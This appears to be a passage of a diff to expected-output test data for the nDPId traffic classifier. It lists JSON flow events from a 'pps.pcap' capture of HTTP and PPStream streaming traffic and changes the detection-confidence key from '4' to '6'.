-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139662,"flow_last_seen":1467353139771,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1467353139819,"flow_last_seen":1467353142600,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":2080,"flow_avg_l4_payload_len":520,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140709,"flow_last_seen":1467353140888,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140628,"flow_last_seen":1467353140677,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":593,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140655,"flow_last_seen":1467353140720,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":1032,"flow_avg_l4_payload_len":516,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353141138,"flow_last_seen":1467353141308,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":705,"flow_avg_l4_payload_len":352,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147705,"flow_last_seen":1467353147794,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":254,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147927,"flow_last_seen":1467353148016,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":356,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353150114,"flow_last_seen":1467353150272,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139505,"flow_last_seen":1467353139595,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":360,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139627,"flow_last_seen":1467353139779,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139662,"flow_last_seen":1467353139771,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1467353139819,"flow_last_seen":1467353142600,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":2080,"flow_avg_l4_payload_len":520,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140709,"flow_last_seen":1467353140888,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140628,"flow_last_seen":1467353140677,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":593,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140655,"flow_last_seen":1467353140720,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":1032,"flow_avg_l4_payload_len":516,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353141138,"flow_last_seen":1467353141308,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":705,"flow_avg_l4_payload_len":352,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147705,"flow_last_seen":1467353147794,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":254,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147927,"flow_last_seen":1467353148016,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":356,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353150114,"flow_last_seen":1467353150272,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7580000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157468,"flow_last_seen":1467353157533,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353165300,"flow_last_seen":1467353165845,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353172912,"flow_last_seen":1467353180202,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1930,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353180357,"flow_last_seen":1467353180443,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353185940,"flow_last_seen":1467353186002,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":774,"flow_avg_l4_payload_len":387,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157468,"flow_last_seen":1467353157533,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353165300,"flow_last_seen":1467353165845,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353172912,"flow_last_seen":1467353180202,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1930,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353180357,"flow_last_seen":1467353180443,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353185940,"flow_last_seen":1467353186002,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":774,"flow_avg_l4_payload_len":387,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1467353202192,"flow_last_seen":1467353202428,"flow_idle_time":7580000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":3039,"flow_avg_l4_payload_len":607,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -505,33 +505,33 @@ 00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1467353136440,"flow_last_seen":1467353136952,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":12973,"flow_avg_l4_payload_len":288,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"219.228.107.156","src_port":22793,"dst_port":1250,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.233.39.81","src_port":22793,"dst_port":18590,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.233.39.81","src_port":22793,"dst_port":18590,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353138931,"flow_last_seen":1467353139050,"flow_idle_time":7580000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":671,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353138931,"flow_last_seen":1467353139050,"flow_idle_time":7580000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":671,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.133.182","src_port":22793,"dst_port":17788,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.133.182","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165563,"flow_last_seen":1467353165659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":379,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 